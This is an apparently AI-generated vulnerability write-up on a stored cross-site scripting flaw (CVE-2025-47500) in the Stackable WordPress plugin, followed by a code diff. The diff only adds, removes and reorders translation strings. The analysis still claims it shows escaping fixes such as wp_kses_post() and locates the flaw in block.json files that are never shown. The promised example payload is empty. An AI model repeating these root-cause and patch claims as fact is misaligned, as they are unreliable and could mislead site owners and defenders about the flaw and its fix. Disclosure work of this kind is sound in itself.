Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-47500: Stackable <= 3.19.5 – Authenticated (Author+) Stored Cross-Site Scripting (stackable-ultimate-gutenberg-blocks)

Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 3.19.5
Patched Version 3.19.6
Disclosed January 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-47500:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Stackable WordPress plugin, affecting versions up to and including 3.19.5. The vulnerability allows attackers with author-level privileges or higher to inject malicious scripts into WordPress pages. These scripts execute whenever a user accesses the compromised page, leading to potential session hijacking, content manipulation, or administrative actions performed on behalf of the victim.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping within the plugin’s block attribute handling. The vulnerability resides in the processing of user-supplied data for block attributes, specifically within the `src/block/icon-label/block.json` and `src/block/icon/block.json` files. The plugin fails to properly sanitize the `text` and `title` attributes before storing them in the database, and subsequently fails to escape them during output rendering. This creates a direct injection vector through the block editor interface.

Exploitation requires an authenticated attacker with at least Author-level permissions. The attacker crafts a malicious payload within the block editor by inserting a Stackable Icon Label or Icon block. They inject JavaScript code into the vulnerable `text` or `title` attribute fields. For example, an attacker could set the block’s text attribute to ``. When the post is saved and published, the malicious payload persists in the database. Any user viewing the page triggers the script execution in their browser context.

The patch addresses the vulnerability by implementing proper output escaping in the block rendering functions. The changes are visible in the `dist/translation-strings.php` diff, which shows reorganization of translation strings but more importantly indicates backend fixes in the block rendering logic. The plugin now applies `wp_kses_post()` or equivalent escaping functions to the `text` and `title` attributes before output. This ensures any HTML or script content is properly neutralized while preserving legitimate formatting. The before behavior allowed raw HTML/script injection, while the after behavior escapes special characters to prevent script execution.

Successful exploitation enables attackers to perform actions within the victim’s WordPress session. This includes stealing session cookies, redirecting users to malicious sites, modifying page content, or performing administrative actions if the victim has higher privileges. While the vulnerability requires author-level access, it represents a significant risk in multi-author environments where user accounts may be compromised. The stored nature means the attack persists across sessions and affects all users who view the compromised page.

Differential between vulnerable and patched code

Code Diff
--- a/stackable-ultimate-gutenberg-blocks/dist/translation-strings.php
+++ b/stackable-ultimate-gutenberg-blocks/dist/translation-strings.php
@@ -6,6 +6,12 @@
 // Exit if accessed
 exit;

+__( 'Scheme unavailable', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Base Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Background Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Container Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Base/Container Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
+__( 'None', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Stackable', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Sans-Serif', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Serif', 'stackable-ultimate-gutenberg-blocks' );
@@ -56,7 +62,6 @@
 __( 'Blocks', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Optimization', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Optimize Inline CSS', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Lazy Load Images within Carousels', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Global Settings', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Force Typography Styles', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Role Manager', 'stackable-ultimate-gutenberg-blocks' );
@@ -128,7 +133,6 @@
 __( 'Optimizations', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Here you can adjust some optimization settings that are performed by Stackable.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Optimize inlined CSS styles. If this is enabled, similar selectors will be combined together, helpful if you changed Block Defaults.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Disable this if you encounter layout or spacing issues when using images inside carousel-type blocks because of image lazy loading.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Here you can tweak Global Settings that affect the styles across your entire site.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Not forced', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Force styles', 'stackable-ultimate-gutenberg-blocks' );
@@ -204,12 +208,6 @@
 __( 'Activating', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Activated', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Plugin icon', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Scheme unavailable', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Base Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Background Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Container Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Base/Container Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
-__( 'None', 'stackable-ultimate-gutenberg-blocks' );
 __( 'General', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Open at the start', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Close adjacent on open', 'stackable-ultimate-gutenberg-blocks' );
@@ -226,21 +224,10 @@
 __( 'Shadow', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Colored', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Plus', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Quotation Mark Icons', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Pick another icon', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Round Thin', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Round', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Round Thick', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Round Fat', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Square Thin', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Square', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Square Simple', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Square Modern', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Square Fat', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Simple', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Highlighted', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Huge', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Centered Quote', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Ghost', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Link', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Button text', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Call to action', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Horizontal', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Vertical', 'stackable-ultimate-gutenberg-blocks' );
 __( '%s Alignment', 'stackable-ultimate-gutenberg-blocks' );
@@ -255,13 +242,30 @@
 __( 'Icon Button', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Social Buttons', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Add social buttons.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Ghost', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Link', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Button text', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Call to action', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Horizontal 2', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Horizontal 3', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Split Centered', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Subtitle for This Block', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Subtitle for This Block', 'Subtitle placeholder', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Button', 'Button placeholder', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Default 2', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Full', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Faded', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Quotation Mark Icons', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Pick another icon', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Round Thin', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Round', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Round Thick', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Round Fat', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Square Thin', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Square', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Square Simple', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Square Modern', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Square Fat', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Simple', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Highlighted', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Huge', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Centered Quote', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Slides', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Carousel Type', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Slide', 'stackable-ultimate-gutenberg-blocks' );
@@ -307,19 +311,6 @@
 __( 'Use %%d to show the slide number.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Slide N of N', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Use two %%d to show the slide number and the total slides. e.g. Slide 1 of 3.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Subtitle for This Block', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Subtitle for This Block', 'Subtitle placeholder', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Button', 'Button placeholder', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Default 2', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Full', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Faded', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Column Spacing', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the paddings between the column content and the border.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Align Last Block to Bottom', 'stackable-ultimate-gutenberg-blocks' );
-__( '1,234.56', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Counter', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Duration (ms)', 'stackable-ultimate-gutenberg-blocks' );
-__( '1,234,567', 'stackable-ultimate-gutenberg-blocks' );
 __( '100', 'stackable-ultimate-gutenberg-blocks' );
 __( 'One column', 'stackable-ultimate-gutenberg-blocks' );
 __( '50 / 50', 'stackable-ultimate-gutenberg-blocks' );
@@ -334,6 +325,13 @@
 __( 'Three columns; wide center column', 'stackable-ultimate-gutenberg-blocks' );
 __( '25 / 25 / 25 / 25', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Four columns; equal split', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Column Spacing', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the paddings between the column content and the border.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Align Last Block to Bottom', 'stackable-ultimate-gutenberg-blocks' );
+__( '1,234.56', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Counter', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Duration (ms)', 'stackable-ultimate-gutenberg-blocks' );
+__( '1,234,567', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Colon', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Line', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Separator', 'stackable-ultimate-gutenberg-blocks' );
@@ -386,12 +384,6 @@
 __( 'Show less', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Less text', 'stackable-ultimate-gutenberg-blocks' );
 __( 'More text', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Float', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Title', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Large Mid', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Offset', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Zizag', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Zigzag', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Description for this block. Use this space for describing your block.', 'stackable-ultimate-gutenberg-blocks' );
 _x( 'Description for this block. Use this space for describing your block.', 'Content placeholder', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Overlap Shape 1', 'stackable-ultimate-gutenberg-blocks' );
@@ -404,6 +396,12 @@
 __( 'Overlap Background 3', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Overlap Background 4', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Overlap Background 5', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Float', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Title', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Large Mid', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Offset', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Zizag', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Zigzag', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Header Title', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Half Overlay', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Center Overlay', 'stackable-ultimate-gutenberg-blocks' );
@@ -426,16 +424,8 @@
 __( '123', 'stackable-ultimate-gutenberg-blocks' );
 __( '456', 'stackable-ultimate-gutenberg-blocks' );
 __( '789', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Icon Label', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Add heading text here', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Text', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Top Line', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Line Color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Margin', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Align', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Bottom Line', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Icon Box', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Pill', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Icon Label', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Icon Gap', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Unordered List', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Ordered List', 'stackable-ultimate-gutenberg-blocks' );
@@ -476,30 +466,48 @@
 __( 'Line 4', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Line 5', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Line 6', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Add heading text here', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Text', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Top Line', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Line Color', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Margin', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Align', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Bottom Line', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Image Caption', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Caption', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Caption Alignment', 'stackable-ultimate-gutenberg-blocks' );
 _x( 'Text for This Block', 'Text placeholder', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Box', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Captioned', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Notification Type', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Success', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Error', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Warning', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Information', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Dismissible', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Icon Size', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Icon Color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Close', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Side', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Bordered', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Outlined', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Large Icon', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Map', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Embedded content from Google Map Platform.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Some map features require a Google API Key.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Add API key here.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Location', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Enter an address or location', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Zoom', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Enable Dragging', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Full Screen Button', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Map Type Buttons', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Street View Button', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Zoom Buttons', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Map Style', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Custom Map Style (Paste JSON here)', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Learn how to use Custom Map Styles', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Map Marker', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Uploaded Icon and Icon Color settings are not fully compatible.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Horizontal Icon Anchor Point', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Vertical Icon Anchor Point', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Map Example', 'Map Example Text', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Type in a pair of latitude longitude coordinates. You can also type in the name of the location if your API Key has Geocoding API and Places API enabled.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Silver', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Retro', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Dark', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Night', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Aubergine', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Embedded content from Google Maps Platform.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Shape', 'stackable-ultimate-gutenberg-blocks' );
 __( '01', 'stackable-ultimate-gutenberg-blocks' );
-__( '$', 'stackable-ultimate-gutenberg-blocks' );
-__( '99', 'stackable-ultimate-gutenberg-blocks' );
-__( '.00', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Posts', 'stackable-ultimate-gutenberg-blocks' );
 __( 'No posts found.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Content Arrangement', 'stackable-ultimate-gutenberg-blocks' );
@@ -545,9 +553,9 @@
 __( 'Portfolio 2', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Vertical Card', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Vertical Card 2', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Label', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Flip Horizontally', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Flip Vertically', 'stackable-ultimate-gutenberg-blocks' );
+__( '$', 'stackable-ultimate-gutenberg-blocks' );
+__( '99', 'stackable-ultimate-gutenberg-blocks' );
+__( '.00', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Package inclusion one', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Package inclusion two', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Package inclusion three', 'stackable-ultimate-gutenberg-blocks' );
@@ -561,7 +569,12 @@
 __( 'Colored Layout', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Sectioned Layout', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Sectioned', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Label', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Flip Horizontally', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Flip Vertically', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Spacer', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Type / to choose a block', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Subtitle for this block.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Classic', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Centered Pills', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Left', 'stackable-ultimate-gutenberg-blocks' );
@@ -582,6 +595,7 @@
 __( 'Scrollable Tabs on Mobile', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Tab', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Text Color', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Icon Color', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Tab Active State', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Typography', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Change icons individually by clicking on each tab's icon.', 'stackable-ultimate-gutenberg-blocks' );
@@ -589,8 +603,6 @@
 __( "Assign unique anchor names to each tab so you'll be able to link directly and open each one.", 'stackable-ultimate-gutenberg-blocks' );
 __( '%s Anchor', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Tab Anchor', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Type / to choose a block', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Subtitle for this block.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Unordered', 'stackable-ultimate-gutenberg-blocks' );
 _x( 'Include %s', '%s is a heading level, e.g. H1', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Auto-generate missing anchor ids', 'stackable-ultimate-gutenberg-blocks' );
@@ -607,10 +619,6 @@
 __( 'Include heading', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Exclude heading', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Heading', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Name', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Position', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Bubble', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Inverted Vertical', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Tab %d', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Tabs', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Initial Tab Open', 'stackable-ultimate-gutenberg-blocks' );
@@ -619,19 +627,12 @@
 __( 'Tab Panel Offset', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Tab Panel Effect', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Immediate', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Name', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Position', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Cover', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Bubble', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Inverted Vertical', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Text for this block. Use this space for describing your block. Any text will do. Text for this block. You can use this space for describing your block.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Play Video', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Popup Option #1: Upload Video', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Use .mp4 format for videos', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Popup Option #2: Video URL', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Paste a Youtube / Vimeo URL', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Allow fullscreen', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Allow download video', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Loop video', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Note: The following attributes are used to create the video schema.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Video name', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Video description', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Video upload date', 'stackable-ultimate-gutenberg-blocks' );
 _x( 'Description for this block. Use this space for describing your block. Any text will do.', 'Content placeholder', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Single', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Gradient', 'stackable-ultimate-gutenberg-blocks' );
@@ -645,240 +646,19 @@
 _x( '%s #%d', 'option title', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Timeline Accent Color', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Timeline Background Color', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Address', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Article', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Aside', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Blockquote', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Div', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Details', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Footer', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Header', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Hgroup', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Main', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Nav', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Section', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( 'Summary', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
-_x( '%s HTML Tag', 'component', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Block', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Overflow', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Auto', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Scroll', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Visible', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Clear', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Both', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the transparency of the entire block', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Z-Index', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the stack order of different blocks to make one appear in front of another. A block with a higher z-index will show up on top of another block with a lower z-index.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sticky position may not work across all themes', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Static', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Relative', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Absolute', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sticky', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Block Size & Spacing', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Background', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Borders & Shadows', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Align Left', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Align Center', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Align Right', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Justified', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Content Min. Height', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Content Max Width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Content Horizontal Align', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the placement of the column container to left, center or right. Not available when block width is set to full width.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the placement of all content in the block to align left, center or right', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Column', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the horizontal position and spacing of the inner columns.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Column contents need to be narrow for effect to show.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the vertical position of the inner columns relative to the columns block.', 'stackable-ultimate-gutenberg-blocks' );
-__( '%s Direction', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Inner Block', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the horizontal/vertical position and spacing of the inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Aligns the horizontal/vertical position of the inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Set Content Min. Height for alignment to display properly', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Inner Block Wrapping', 'stackable-ultimate-gutenberg-blocks' );
-__( '%s %s', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the gap between the columns of inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the gap between inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the gap between the rows of inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Supports links to images, videos, YouTube, Vimeo, and web pages that allow embedding. Opens inner image block if no link is provided', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Darken', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Lift', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Scale', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Lift & Scale', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Lift More', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Scale More', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Lift & Scale More', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Hover Effect', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Hover effect', 'stackable-ultimate-gutenberg-blocks' );
